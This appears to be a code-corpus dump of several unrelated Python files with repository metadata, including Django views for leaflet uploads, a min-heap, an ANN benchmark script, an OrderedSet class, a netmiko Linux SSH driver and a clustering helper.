2017-02-08T09:19:53.000Z
|
import os
from django.template import RequestContext
from django.shortcuts import render_to_response, get_object_or_404, redirect
from django.contrib.formtools.wizard.views import NamedUrlSessionWizardView
from django.core.urlresolvers import reverse
from django.conf import settings
from django.views.generic import DetailView, ListView, DetailView
from django.core.files.storage import FileSystemStorage
from .models import Leaflet, LeafletImage
class ImageView(DetailView):
model = LeafletImage
template_name = 'leaflets/full.html'
pk_url_kwarg = 'image_key'
# def view_full_image(request, image_key):
#
# li = LeafletImage.objects.filter(pk=image_key)
# if li.count() == 1:
# li = get_object_or_404(LeafletImage, image_key=image_key)
# else:
# # Should not do this, we'll need to fix it
# # probably and upload artifact
# li = li.all()[0]
#
# return render_to_response('leaflets/full.html',
# {
# 'image': li,
# 'leaflet': li.leaflet,
# },
# context_instance=RequestContext(request), )
def view_all_full_images(request, leafletid):
from leaflets.models import Leaflet, LeafletImage
leaflet = get_object_or_404(Leaflet, pk=leafletid)
images = LeafletImage.objects.filter(leaflet=leaflet)
return render_to_response('leaflets/full_all.html',
{
'images': images,
'leaflet': leaflet,
},
context_instance=RequestContext(request), )
class LatestLeaflets(ListView):
model = Leaflet
template_name = 'leaflets/index.html'
paginate_by = 60
class LeafletView(DetailView):
template_name = 'leaflets/leaflet.html'
queryset = Leaflet.objects.all()
class LeafletUploadWizzard(NamedUrlSessionWizardView):
TEMPLATES = {
"front": "leaflets/upload_form/image_form.html",
"postcode": "leaflets/upload_form/postcode.html",
"cc": "checkout/creditcard.html",
"confirmation": "checkout/confirmation.html",
}
# template_name = "leaflets/upload_form/image_form.html"
file_storage = FileSystemStorage(location=os.path.join(
settings.MEDIA_ROOT, 'images/leaflets_tmp'))
def get_template_names(self):
return [self.TEMPLATES[self.steps.current]]
# def render_next_step(self, form, **kwargs):
# data = get_cleaned_data('2') # or whatever your step with the
# flag is
# if data.get('your_flag', False):
# self.storage.reset()
# return HttpResponseRedirect()
# return super(Wizard, self).render_next_step(self, form, **kwargs)
def done(self, form_list, **kwargs):
#Create a new leaflet
leaflet = Leaflet()
leaflet.save()
# Front
front_image = LeafletImage(leaflet=leaflet, image_type="1_front")
front_image.image = form_list[0].cleaned_data['image']
front_image.save()
return redirect(reverse('leaflet', kwargs={'pk': leaflet.pk}))
| 33.6875
| 79
| 0.629252
| 1,638
| 0.506494
| 0
| 0
| 0
| 0
| 0
| 0
| 1,341
| 0.414657
|
3c44954b74ac962e577c29775c64025c256cc805
| 3,409
|
py
|
Python
|
Heap/heap.py
|
jeremy2918/data-structures
|
17685212aac38979929ca923eb2f9b989c74d07a
|
[
"MIT"
] | 1
|
2021-12-14T19:57:28.000Z
|
2021-12-14T19:57:28.000Z
|
Heap/heap.py
|
jeremy2918/data-structures
|
17685212aac38979929ca923eb2f9b989c74d07a
|
[
"MIT"
] | null | null | null |
Heap/heap.py
|
jeremy2918/data-structures
|
17685212aac38979929ca923eb2f9b989c74d07a
|
[
"MIT"
] | null | null | null |
# Min Heap Implementation
class Heap():
def __init__(self, initial_data=[]):
self.data = []
if isinstance(initial_data, int):
self.data = [initial_data]
elif isinstance(initial_data, list):
self.data = list(initial_data)
# Returns the number of element in the heap
def size(self):
return len(self.data)
# Add an element to the min heap
def add(self, elem):
self.data.append(elem)
self.swim(len(self.data) - 1)
# Removes and return the element with the highest priority (first element)
def poll(self):
if self.is_empty():
raise Exception("Min heap is empty")
polled = self.data[0]
self.remove(polled)
return polled
# Removes an element form the heap
def remove(self, elem):
if self.is_empty():
raise Exception("Min heap is empty")
index = self.index(elem)
if index == -1:
raise Exception(f"Heap does not contain the element <{elem}>")
self.swap(index, self.size() - 1)
self.data.pop()
# If the element was the last one, do nothing else
if index == self.size():
return
if not self.is_empty():
self.sink(index)
self.swim(index)
# Bubble up an element at a k position
def swim(self, k):
parent = (k - 1) // 2
# Keep swimming while we have not reached the
# root and while we're less than our parent.
while k > 0 and self.data[k] < self.data[parent]:
self.swap(k, parent)
k = parent
parent = (k - 1) // 2
# Bubble down an element at a k position
def sink(self, k):
while True:
left = 2 * k + 1
right = 2 * k + 2
smallest = left
# Take the left children as smallest by default
# Change only if right children is less than left children
if right < self.size() and self.data[right] < self.data[left]:
smallest = right
# Keep swaping while k is less than parent and
# we are not at the last position of the heap
if left >= self.size() or self.data[k] < self.data[smallest]:
break
self.swap(k, smallest)
k = smallest
# Swaps the positions of two elements given their indexes
def swap(self, i1, i2):
elem1 = self.data[i1]
elem2 = self.data[i2]
self.data[i1] = elem2
self.data[i2] = elem1
# Returns whether the heap is empty
def is_empty(self):
return self.size() == 0
# Returns the first element (smallest) of the heap
def peek(self):
return self.data[0] if not self.is_empty() else None
# Returns the index of an element in the heap, -1 if it is not contained
def index(self, elem):
for index, value in enumerate(self.data):
if value == elem:
return index
return -1
# Whether an element in contained in the heap
def contains(self, elem):
return self.index(elem) != -1
# Represetantion method
def __repr__(self):
return f"Heap({repr(self.data)})"
# Convert to string method
def __str__(self):
return str(self.data)
# Len of linked list
def __len__(self):
return len(self.data)
| 29.387931
| 78
| 0.566442
| 3,381
| 0.991786
| 0
| 0
| 0
| 0
| 0
| 0
| 1,058
| 0.310355
|
3c460fdfda615228be90ea72ed8b2f5c151649c7
| 16,921
|
py
|
Python
|
benchmarks/benchmark_script.py
|
oddconcepts/n2o
|
fe6214dcc06a1b13be60733c53ac25bca3c2b4d0
|
[
"Apache-2.0"
] | 2
|
2019-02-13T12:59:27.000Z
|
2020-01-28T02:02:47.000Z
|
benchmarks/benchmark_script.py
|
oddconcepts/n2o
|
fe6214dcc06a1b13be60733c53ac25bca3c2b4d0
|
[
"Apache-2.0"
] | 2
|
2019-06-25T10:00:57.000Z
|
2019-10-26T14:55:23.000Z
|
benchmarks/benchmark_script.py
|
oddconcepts/n2o
|
fe6214dcc06a1b13be60733c53ac25bca3c2b4d0
|
[
"Apache-2.0"
] | 1
|
2021-11-03T14:59:27.000Z
|
2021-11-03T14:59:27.000Z
|
# This code is based on the code
# from ann-benchmark repository
# created by Erik Bernhardsson
# https://github.com/erikbern/ann-benchmarks
import gzip
import numpy
import time
import os
import multiprocessing
import argparse
import pickle
import resource
import random
import math
import logging
import shutil
import subprocess
import sys
import tarfile
from contextlib import closing
try:
xrange
except NameError:
xrange = range
try:
from urllib2 import urlopen
except ImportError:
from urllib.request import urlopen
from n2 import HnswIndex
n2_logger = logging.getLogger("n2_benchmark")
n2_logger.setLevel(logging.INFO)
# Set resource limits to prevent memory bombs
memory_limit = 12 * 2**30
soft, hard = resource.getrlimit(resource.RLIMIT_DATA)
if soft == resource.RLIM_INFINITY or soft >= memory_limit:
n2_logger.info('resetting memory limit from {0} to {1}. '.format(soft, memory_limit))
resource.setrlimit(resource.RLIMIT_DATA, (memory_limit, hard))
INDEX_DIR='indices'
DATA_DIR = './datasets/'
GLOVE_DIR = DATA_DIR + 'glove.txt'
SIFT_DIR = DATA_DIR + 'sift.txt'
YOUTUBE_DIR = DATA_DIR + 'youtube.txt'
class BaseANN(object):
def use_threads(self):
return True
class BruteForceBLAS(BaseANN):
"""kNN search that uses a linear scan = brute force."""
def __init__(self, metric, precision=numpy.float32):
if metric not in ('angular', 'euclidean'):
raise NotImplementedError("BruteForceBLAS doesn't support metric %s" % metric)
self._metric = metric
self._precision = precision
self.name = 'BruteForceBLAS()'
def fit(self, X):
"""Initialize the search index."""
lens = (X ** 2).sum(-1) # precompute (squared) length of each vector
if self._metric == 'angular':
X /= numpy.sqrt(lens)[..., numpy.newaxis] # normalize index vectors to unit length
self.index = numpy.ascontiguousarray(X, dtype=self._precision)
elif self._metric == 'euclidean':
self.index = numpy.ascontiguousarray(X, dtype=self._precision)
self.lengths = numpy.ascontiguousarray(lens, dtype=self._precision)
else:
assert False, "invalid metric" # shouldn't get past the constructor!
def query(self, v, n):
"""Find indices of `n` most similar vectors from the index to query vector `v`."""
v = numpy.ascontiguousarray(v, dtype=self._precision) # use same precision for query as for index
# HACK we ignore query length as that's a constant not affecting the final ordering
if self._metric == 'angular':
# argmax_a cossim(a, b) = argmax_a dot(a, b) / |a||b| = argmin_a -dot(a, b)
dists = -numpy.dot(self.index, v)
elif self._metric == 'euclidean':
# argmin_a (a - b)^2 = argmin_a a^2 - 2ab + b^2 = argmin_a a^2 - 2ab
dists = self.lengths - 2 * numpy.dot(self.index, v)
else:
assert False, "invalid metric" # shouldn't get past the constructor!
indices = numpy.argpartition(dists, n)[:n] # partition-sort by distance, get `n` closest
return sorted(indices, key=lambda index: dists[index]) # sort `n` closest into correct order
class N2(BaseANN):
def __init__(self, m, ef_construction, n_threads, ef_search, metric):
self._m = m
self._m0 = m * 2
self._ef_construction = ef_construction
self._n_threads = n_threads
self._ef_search = ef_search
self._index_name = os.path.join(INDEX_DIR, "n2_%s_M%d_efCon%d_n_thread%s_data_size%d" % (args.dataset, m, ef_construction, n_threads, max(args.data_size, 0)))
self.name = "N2_M%d_efCon%d_n_thread%s_efSearch%d" % (m, ef_construction, n_threads, ef_search)
self._metric = metric
d = os.path.dirname(self._index_name)
if not os.path.exists(d):
os.makedirs(d)
def fit(self, X):
if self._metric == 'euclidean':
self._n2 = HnswIndex(X.shape[1], 'L2')
else:
self._n2 = HnswIndex(X.shape[1])
if os.path.exists(self._index_name):
n2_logger.info("Loading index from file")
self._n2.load(self._index_name)
else:
n2_logger.info("Index file is not exist: {0}".format(self._index_name))
n2_logger.info("Start fitting")
for i, x in enumerate(X):
self._n2.add_data(x.tolist())
self._n2.build(m=self._m, max_m0=self._m0, ef_construction=self._ef_construction, n_threads=self._n_threads)
self._n2.save(self._index_name)
def query(self, v, n):
return self._n2.search_by_vector(v.tolist(), n, self._ef_search)
def __str__(self):
return self.name
class NmslibReuseIndex(BaseANN):
def __init__( self, metric, method_name, index_param, save_index,query_param):
self._nmslib_metric = {
'angular': 'cosinesimil',
'euclidean': 'l2'}[metric]
self._method_name = method_name
self._save_index = save_index
self._index_param = index_param
self._query_param = query_param
self.name = 'Nmslib(method_name=%s, index_param=%s, query_param=%s)' % (
method_name, index_param, query_param)
self._index_name = os.path.join(
INDEX_DIR, "youtube_nmslib_%s_%s_%s_data_size_%d" %
(self._method_name, metric, '_'.join(
self._index_param), max(args.data_size, 0)))
d = os.path.dirname(self._index_name)
if not os.path.exists(d):
os.makedirs(d)
def fit(self, X):
import nmslib
self._index = nmslib.init(
self._nmslib_metric,
[],
self._method_name,
nmslib.DataType.DENSE_VECTOR,
nmslib.DistType.FLOAT)
for i, x in enumerate(X):
nmslib.addDataPoint(self._index, i, x.tolist())
if os.path.exists(self._index_name):
logging.debug("Loading index from file")
nmslib.loadIndex(self._index, self._index_name)
else:
logging.debug("Create Index")
nmslib.createIndex(self._index, self._index_param)
if self._save_index:
nmslib.saveIndex(self._index, self._index_name)
nmslib.setQueryTimeParams(self._index, self._query_param)
def query(self, v, n):
import nmslib
return nmslib.knnQuery(self._index, n, v.tolist())
def freeIndex(self):
import nmslib
nmslib.freeIndex(self._index)
class Annoy(BaseANN):
def __init__(self, metric, n_trees, search_k):
self._n_trees = n_trees
self._search_k = search_k
self._metric = metric
self._index_name = os.path.join(
INDEX_DIR, "youtube_annoy_%s_tree%d_data_size_%d" %
(metric, n_trees, max(args.data_size, 0)))
self.name = 'Annoy(n_trees=%d, search_k=%d)' % (n_trees, search_k)
d = os.path.dirname(self._index_name)
if not os.path.exists(d):
os.makedirs(d)
def fit(self, X):
import annoy
self._annoy = annoy.AnnoyIndex(f=X.shape[1], metric=self._metric)
if os.path.exists(self._index_name):
logging.debug("Loading index from file")
self._annoy.load(self._index_name)
else:
logging.debug("Index file not exist start fitting!!")
for i, x in enumerate(X):
self._annoy.add_item(i, x.tolist())
self._annoy.build(self._n_trees)
self._annoy.save(self._index_name)
def query(self, v, n):
return self._annoy.get_nns_by_vector(v.tolist(), n, self._search_k)
def run_algo(args, library, algo, results_fn):
pool = multiprocessing.Pool()
X_train, X_test = get_dataset(which=args.dataset, data_size=args.data_size, test_size=args.test_size, random_state = args.random_state)
pool.close()
pool.join()
t0 = time.time()
algo.fit(X_train)
build_time = time.time() - t0
n2_logger.info('Built index in {0}'.format(build_time))
best_search_time = float('inf')
best_precision = 0.0 # should be deterministic but paranoid
try_count = args.try_count
for i in xrange(try_count): # Do multiple times to warm up page cache, use fastest
results = []
search_time = 0.0
current_query = 1
total_queries = len(queries)
for j in range(total_queries):
v, correct = queries[j]
sys.stdout.write("Querying: %d / %d \r" % (current_query, total_queries))
t0 = time.time()
found = algo.query(v, GT_SIZE)
search_time += (time.time() - t0)
if len(found) < len(correct):
n2_logger.info('found: {0}, correct: {1}'.format(len(found), len(correct)))
current_query += 1
results.append(len(set(found).intersection(correct)))
k = float(sum(results))
search_time /= len(queries)
precision = k / (len(queries) * GT_SIZE)
best_search_time = min(best_search_time, search_time)
best_precision = max(best_precision, precision)
sys.stdout.write('*[%d/%d][algo: %s] search time: %s, precision: %.5f \r' % (i+1, try_count, str(algo), str(search_time), precision))
sys.stdout.write('\n')
output = [library, algo.name, build_time, best_search_time, best_precision]
n2_logger.info(str(output))
f = open(results_fn, 'a')
f.write('\t'.join(map(str, output)) + '\n')
f.close()
n2_logger.info('Summary: {0}'.format('\t'.join(map(str, output))))
def get_dataset(which='glove', data_size=-1, test_size = 10000, random_state = 3):
cache = 'queries/%s-%d-%d-%d.npz' % (which, max(args.data_size, 0), test_size, random_state)
if os.path.exists(cache):
v = numpy.load(cache)
X_train = v['train']
X_test = v['test']
n2_logger.info('{0} {1}'.format(X_train.shape, X_test.shape))
return X_train, X_test
local_fn = os.path.join('datasets', which)
if os.path.exists(local_fn + '.gz'):
f = gzip.open(local_fn + '.gz')
else:
f = open(local_fn + '.txt')
X = []
for i, line in enumerate(f):
v = [float(x) for x in line.strip().split()]
X.append(v)
if data_size != -1 and len(X) == data_size:
break
X = numpy.vstack(X)
import sklearn.cross_validation
# Here Erik is most welcome to use any other random_state
# However, it is best to use a new random seed for each major re-evaluation,
# so that we test on a trully bind data.
X_train, X_test = sklearn.cross_validation.train_test_split(X, test_size=test_size, random_state=random_state)
X_train = X_train.astype(numpy.float)
X_test = X_test.astype(numpy.float)
numpy.savez(cache, train=X_train, test=X_test)
return X_train, X_test
def get_queries(args):
n2_logger.info('computing queries with correct results...')
bf = BruteForceBLAS(args.distance)
X_train, X_test = get_dataset(which=args.dataset, data_size=args.data_size, test_size=args.test_size, random_state=args.random_state)
# Prepare queries
bf.fit(X_train)
queries = []
total_queries = len(X_test)
for x in X_test:
correct = bf.query(x, GT_SIZE)
queries.append((x, correct))
sys.stdout.write('computing queries %d/%d ...\r' % (len(queries), total_queries))
sys.stdout.write('\n')
return queries
def get_fn(base, args):
fn = os.path.join(base, args.dataset)
if args.data_size != -1:
fn += '-%d' % args.data_size
if args.test_size != -1:
fn += '-%d' % args.test_size
fn += '-%d' % args.random_state
if os.path.exists(fn + '.gz'):
fn += '.gz'
else:
fn += '.txt'
d = os.path.dirname(fn)
if not os.path.exists(d):
os.makedirs(d)
return fn
def download_file(url, dst):
file_name = url.split('/')[-1]
with closing(urlopen(url)) as res:
with open(dst+"/"+file_name, 'wb') as f:
file_size = int(res.headers["Content-Length"])
sys.stdout.write("Downloading datasets %s\r" % (file_name))
file_size_dl = 0
block_sz = 10240
while True:
buffer = res.read(block_sz)
if not buffer:
break
file_size_dl += len(buffer)
f.write(buffer)
sys.stdout.write("Downloading datasets %s: %d / %d bytes\r" % (file_name, file_size_dl, file_size))
sys.stdout.write('\n')
if __name__ == '__main__':
global GT_SIZE
parser = argparse.ArgumentParser()
parser.add_argument('--distance', help='Distance metric', default='angular')
parser.add_argument('--try_count', help='Number of test attempts', type=int, default=3)
parser.add_argument('--dataset', help='Which dataset', default='glove')
parser.add_argument('--data_size', help='Maximum # of data points', type=int, default=-1)
parser.add_argument('--test_size', help='Maximum # of data queries', type=int, default=10000)
parser.add_argument('--n_threads', help='Number of threads', type=int, default=10)
parser.add_argument('--random_state', help='Random seed', type=int, default=3)
parser.add_argument('--algo', help='Algorithm', type=str)
args = parser.parse_args()
if not os.path.exists(DATA_DIR):
os.makedirs(DATA_DIR)
numpy.random.seed(args.random_state)
if args.dataset == 'glove':
GT_SIZE = 10
elif args.dataset == 'sift':
GT_SIZE = 10
elif args.dataset == 'youtube':
GT_SIZE = 100
else:
print('Invalid dataset: {}'.format(args.dataset))
exit(0)
print('* GT size: {}'.format(GT_SIZE))
if args.dataset == 'glove' and not os.path.exists(GLOVE_DIR):
download_file("https://s3-us-west-1.amazonaws.com/annoy-vectors/glove.twitter.27B.100d.txt.gz", "datasets")
with gzip.open('datasets/glove.twitter.27B.100d.txt.gz', 'rb') as f_in, open('datasets/glove.twitter.27B.100d.txt', 'wb') as f_out:
shutil.copyfileobj(f_in, f_out)
subprocess.call("cut -d \" \" -f 2- datasets/glove.twitter.27B.100d.txt > datasets/glove.txt", shell=True)
if args.dataset == 'sift' and not os.path.exists(SIFT_DIR):
download_file("ftp://ftp.irisa.fr/local/texmex/corpus/sift.tar.gz", "datasets")
with tarfile.open("datasets/sift.tar.gz") as t:
t.extractall(path="datasets")
subprocess.call("python datasets/convert_texmex_fvec.py datasets/sift/sift_base.fvecs >> datasets/sift.txt", shell=True)
if args.dataset == 'youtube' and not os.path.exists(YOUTUBE_DIR):
raise IOError('Please follow the instructions in the guide to download the YouTube dataset.')
results_fn = get_fn('results', args)
queries_fn = get_fn('queries', args)
logging.info('storing queries in {0} and results in {1}.'.format(queries_fn, results_fn))
if not os.path.exists(queries_fn):
queries = get_queries(args)
with open(queries_fn, 'wb') as f:
pickle.dump(queries, f)
else:
queries = pickle.load(open(queries_fn, 'rb'))
logging.info('got {0} queries'.format(len(queries)))
algos = {
'annoy': [ Annoy('angular', n_trees, search_k)
for n_trees in [10, 50, 100]
for search_k in [ 7, 3000, 50000, 200000, 500000]
],
'n2': [ N2(M, ef_con, args.n_threads, ef_search, 'angular')
for M, ef_con in [ (12, 100)]
for ef_search in [1, 10, 25, 50, 100, 250, 500, 750, 1000, 1500, 2500, 5000, 10000, 100000]
],
'nmslib': []}
MsPostsEfs = [
({'M': 12,
'post': 0,
'indexThreadQty': args.n_threads,
'delaunay_type': 2,
'efConstruction': 100,
},
[1, 10, 25, 50, 100, 250, 500, 750, 1000, 1500, 2000, 2500],
),
]
for oneCase in MsPostsEfs:
for ef in oneCase[1]:
params = ['%s=%s' % (k, str(v)) for k, v in oneCase[0].items()]
algos['nmslib'].append(
NmslibReuseIndex( 'angular', 'hnsw', params, True, ['ef=%d' % ef]))
algos_flat = []
if args.algo:
print('running only: %s' % str(args.algo))
algos = {args.algo: algos[args.algo]}
for library in algos.keys():
for algo in algos[library]:
algos_flat.append((library, algo))
random.shuffle(algos_flat)
logging.debug('order: %s' % str([a.name for l, a in algos_flat]))
for library, algo in algos_flat:
logging.info(algo.name)
# Spawn a subprocess to force the memory to be reclaimed at the end
p = multiprocessing.Process(target=run_algo, args=(args, library, algo, results_fn))
p.start()
p.join()
| 37.602222
| 166
| 0.61929
| 6,555
| 0.387388
| 0
| 0
| 0
| 0
| 0
| 0
| 3,517
| 0.207848
|
3c48c2125ebec3cfbc2f8abe3432087a8f247884
| 28
|
py
|
Python
|
ars/__init__.py
|
david-lindner/ARS
|
acfe403ebe90c157d61690a9498597244853fc78
|
[
"BSD-2-Clause"
] | null | null | null |
ars/__init__.py
|
david-lindner/ARS
|
acfe403ebe90c157d61690a9498597244853fc78
|
[
"BSD-2-Clause"
] | null | null | null |
ars/__init__.py
|
david-lindner/ARS
|
acfe403ebe90c157d61690a9498597244853fc78
|
[
"BSD-2-Clause"
] | null | null | null |
from .ars import ARSLearner
| 14
| 27
| 0.821429
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
3c4c370cfd780bfee437676b79c4d199589eb48b
| 618
|
py
|
Python
|
setup.py
|
elaru/python3-cre
|
84863b5acaab5f903a3d3b2a1b6a2cb10ed00679
|
[
"0BSD"
] | null | null | null |
setup.py
|
elaru/python3-cre
|
84863b5acaab5f903a3d3b2a1b6a2cb10ed00679
|
[
"0BSD"
] | null | null | null |
setup.py
|
elaru/python3-cre
|
84863b5acaab5f903a3d3b2a1b6a2cb10ed00679
|
[
"0BSD"
] | null | null | null |
from setuptools import setup
setup(
name="cre",
packages=["cre"],
version="0.1.0",
author="Philipp Schiffmann",
author_email="philippschiffmann@icloud.com",
url="https://github.com/elaru/python3-cre",
description="A regular expression processor implemented in python.",
license="ISC",
classifiers=[
"Development Status :: 2 - Pre-Alpha",
"Intended Audience :: Developers",
"License :: OSI Approved :: ISC License (ISCL)",
"Operating System :: OS Independent",
"Programming Language :: Python",
"Programming Language :: Python :: 2",
"Programming Language :: Python :: 3"
]
)
| 28.090909
| 69
| 0.676375
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 424
| 0.686084
|
3c4ce0be200904020cc2f4b6271e9daccb20ccb2
| 284
|
py
|
Python
|
bin/const.py
|
Novartole/Video-pixels
|
10246d1953289e1cded43ed63104f5343a3d9e65
|
[
"MIT"
] | null | null | null |
bin/const.py
|
Novartole/Video-pixels
|
10246d1953289e1cded43ed63104f5343a3d9e65
|
[
"MIT"
] | null | null | null |
bin/const.py
|
Novartole/Video-pixels
|
10246d1953289e1cded43ed63104f5343a3d9e65
|
[
"MIT"
] | null | null | null |
import enum
DEFAULT_FILE_NAME = 'DEFAULT'
RANDOM_MIX_CONFIG_NAME = 'RandomMix'
WIDTH_NAME = 'Width'
HIGHT_NAME = 'Hight'
class AutoName(enum.Enum):
def _generate_next_value_(name, start, count, last_values):
return name
class Algorithms(AutoName):
RANDOM_MIX = enum.auto()
| 20.285714
| 61
| 0.760563
| 158
| 0.556338
| 0
| 0
| 0
| 0
| 0
| 0
| 34
| 0.119718
|
3c4dca815ed01033d3b7eadeef2709708a553018
| 1,902
|
py
|
Python
|
src/nr/util/orderedset.py
|
NiklasRosenstein/python-nr.util
|
087f2410d38006c1005a5fb330c47a56bcdb2279
|
[
"MIT"
] | null | null | null |
src/nr/util/orderedset.py
|
NiklasRosenstein/python-nr.util
|
087f2410d38006c1005a5fb330c47a56bcdb2279
|
[
"MIT"
] | 3
|
2022-02-16T13:17:28.000Z
|
2022-03-14T15:28:41.000Z
|
src/nr/util/orderedset.py
|
NiklasRosenstein/python-nr.util
|
087f2410d38006c1005a5fb330c47a56bcdb2279
|
[
"MIT"
] | null | null | null |
import collections
import functools
import typing as t
from nr.util.generic import T
T_OrderedSet = t.TypeVar('T_OrderedSet', bound='OrderedSet')
@functools.total_ordering
class OrderedSet(t.MutableSet[T]):
def __init__(self, iterable: t.Optional[t.Iterable[T]] = None) -> None:
self._index_map: t.Dict[T, int] = {}
self._content: t.Deque[T] = collections.deque()
if iterable is not None:
self.update(iterable)
def __repr__(self) -> str:
if not self._content:
return '%s()' % (type(self).__name__,)
return '%s(%r)' % (type(self).__name__, list(self))
def __iter__(self) -> t.Iterator[T]:
return iter(self._content)
def __reversed__(self) -> 'OrderedSet[T]':
return OrderedSet(reversed(self._content))
def __eq__(self, other: t.Any) -> bool:
if isinstance(other, OrderedSet):
return len(self) == len(other) and list(self) == list(other)
return False
def __le__(self, other: t.Any) -> bool:
return all(e in other for e in self)
def __len__(self) -> int:
return len(self._content)
def __contains__(self, key: t.Any) -> bool:
return key in self._index_map
def __getitem__(self, index: int) -> T:
return self._content[index]
def add(self, key: T) -> None:
if key not in self._index_map:
self._index_map[key] = len(self._content)
self._content.append(key)
def copy(self: T_OrderedSet) -> 'T_OrderedSet':
return type(self)(self)
def discard(self, key: T) -> None:
if key in self._index_map:
index = self._index_map.pop(key)
del self._content[index]
def pop(self, last: bool = True) -> T:
if not self._content:
raise KeyError('set is empty')
key = self._content.pop() if last else self._content.popleft()
self._index_map.pop(key)
return key
def update(self, iterable: t.Iterable[T]) -> None:
for x in iterable:
self.add(x)
| 26.788732
| 73
| 0.656677
| 1,724
| 0.906414
| 0
| 0
| 1,750
| 0.920084
| 0
| 0
| 83
| 0.043638
|
3c4ddc1c01b18295d9fb2f58c8e9a33ac6c57830
| 1,812
|
py
|
Python
|
applied_python/applied_python/lib/python2.7/site-packages/netmiko/linux/linux_ssh.py
|
mith1979/ansible_automation
|
013dfa67c6d91720b787fadb21de574b6e023a26
|
[
"Apache-2.0"
] | null | null | null |
applied_python/applied_python/lib/python2.7/site-packages/netmiko/linux/linux_ssh.py
|
mith1979/ansible_automation
|
013dfa67c6d91720b787fadb21de574b6e023a26
|
[
"Apache-2.0"
] | null | null | null |
applied_python/applied_python/lib/python2.7/site-packages/netmiko/linux/linux_ssh.py
|
mith1979/ansible_automation
|
013dfa67c6d91720b787fadb21de574b6e023a26
|
[
"Apache-2.0"
] | null | null | null |
import re
from netmiko.ssh_connection import SSHConnection
class LinuxSSH(SSHConnection):
def set_base_prompt(self, pri_prompt_terminator='$',
alt_prompt_terminator='#', delay_factor=.1):
"""Determine base prompt."""
return super(SSHConnection, self).set_base_prompt(
pri_prompt_terminator=pri_prompt_terminator,
alt_prompt_terminator=alt_prompt_terminator,
delay_factor=delay_factor)
def send_config_set(self, config_commands=None, exit_config_mode=True, **kwargs):
"""Can't exit from root (if root)"""
if self.username == "root":
exit_config_mode = False
return super(SSHConnection, self).send_config_set(config_commands=config_commands,
exit_config_mode=exit_config_mode,
**kwargs)
def check_config_mode(self, check_string='#'):
"""Verify root"""
return super(SSHConnection, self).check_config_mode(check_string=check_string)
def config_mode(self, config_command='sudo su'):
"""Attempt to become root."""
return self.enable(cmd=config_command)
def exit_config_mode(self, exit_config='exit'):
return super(SSHConnection, self).exit_config_mode(exit_config=exit_config)
def check_enable_mode(self, check_string='#'):
return self.check_config_mode(check_string=check_string)
def exit_enable_mode(self, exit_command='exit'):
return self.exit_config_mode(exit_config=exit_command)
def enable(self, cmd='sudo su', pattern='ssword', re_flags=re.IGNORECASE):
"""Attempt to become root."""
return super(SSHConnection, self).enable(cmd=cmd, pattern=pattern, re_flags=re_flags)
| 42.139535
| 93
| 0.657837
| 1,750
| 0.965784
| 0
| 0
| 0
| 0
| 0
| 0
| 195
| 0.107616
|
3c51be6bea74f985c0302d56a6e42f0067e94f0f
| 4,287
|
py
|
Python
|
K-Cap_2021/2C_associations_by_cluster/build_cluster_hashes.py
|
cultural-ai/ConConCor
|
f5c30dfb7d38392f492f9c6e44c8d242f2820ce4
|
[
"CC-BY-2.0"
] | 1
|
2021-12-14T10:19:55.000Z
|
2021-12-14T10:19:55.000Z
|
K-Cap_2021/2C_associations_by_cluster/build_cluster_hashes.py
|
cultural-ai/ConConCor
|
f5c30dfb7d38392f492f9c6e44c8d242f2820ce4
|
[
"CC-BY-2.0"
] | null | null | null |
K-Cap_2021/2C_associations_by_cluster/build_cluster_hashes.py
|
cultural-ai/ConConCor
|
f5c30dfb7d38392f492f9c6e44c8d242f2820ce4
|
[
"CC-BY-2.0"
] | null | null | null |
"""{Build token: cluster index}, hashes for each specified granularity level in the user-defined list 'clustering_levels_to_consider'
Output: level_xx_hash.json hash to /cluster_hashes
"""
import json
import os
import pickle as pkl
import typing
import numpy as np
def main():
#
# user-defined vars
#
clustering_levels_to_consider = [12]
# consider different cluster granulaties, i.e., snip level from leaf
for clustering_level in clustering_levels_to_consider:
# load the linkage matrix
sav_linkages = "heirarchical_clustering/linkage_matrix.pkl"
with open(sav_linkages, "rb") as f:
z: np.ndarray = pkl.load(f)
# load the list of tokens (which corresponds to the linkage matrix)
# i.e., i in tokens[i], corresponds to cluster i referenced in z[:,0:2]
sav_tokens = "heirarchical_clustering/tokens.json"
with open(sav_tokens, "rb") as f:
tokens: list = json.load(f)
# see link, below, on interpreting z, i.e., cluster_index1, cluster_index2, dist, cluster size
# https://docs.scipy.org/doc/scipy/reference/generated/scipy.cluster.hierarchy.fcluster.html
clusters: typing.Generator = gen_clusters(
level=clustering_level, z=z, tokens=tokens
) # generator of (cluster_index, list of tokens) of each cluster for the current cut 'level'
# build a hash, to translate token to cluster index for given granularity
h: dict = {
token: cluster_index
for cluster_index, cluster in clusters
for token in cluster
}
# save
sav = f"cluster_hashes/level_{clustering_level}_hash.json"
os.makedirs(os.path.dirname(sav), exist_ok=True)
with open(sav, "w") as f:
json.dump(h, f, indent=4)
def gen_clusters(level: int = 1, *, z: np.ndarray, tokens: list) -> typing.Generator:
"""Return a generator of (cluster_index, list of tokens) of each cluster
for the current cut 'level'.
"""
# add an 'operation index' column to z
x: np.ndarray = np.hstack(
(z, np.array([i for i in range(z.shape[0])]).reshape(-1, 1))
)
# note: cluster_index = x[:,4] + len(tokens) is the index of the cluster created by the operation
# cluster indices 0 to len(tokens) - 1, corresponds to the individual tokens
#
# iterate over each cut level (from leafs) until at specified 'level'
# and collect z_rows_of_interest, an iterable of z row indices, representing the clusters wrt., cut 'level'
#
seen_z_rows = [] # all z row clusters seen in previous levels
seen_cluster_indices = [index for index, token in enumerate(tokens)]
for i in range(1, level + 1): # i.e., cluster 1 to level
x_dropped: np.ndarray = np.delete(
x, seen_z_rows, axis=0
) # i.e., drop clusters seen at previous level
x_i: np.ndarray = x_dropped[
[row.all() for row in np.isin(x_dropped[:, 0:2], seen_cluster_indices)]
] # the bit of x that lists the clusters in the current cut level, i.e., those clusters that reference only previously seen cluster_indices
z_rows_of_interest: np.ndarray = x_i[:, 4].astype(int)
seen_z_rows += [row for row in z_rows_of_interest]
seen_cluster_indices += [z_row + len(tokens) for z_row in x_i[:,4]]
# generate a (cluster_index, list of tokens) for each cluster of the current cut 'level'
for row in z_rows_of_interest:
cluster_index = int(x[row, 4]) + len(
tokens
) # i.e., the 'true' cluster indices of z[row,4] + len(tokens) - 1
yield (
cluster_index,
cluster_index_to_tokens(cluster_index, z=z, tokens=tokens),
)
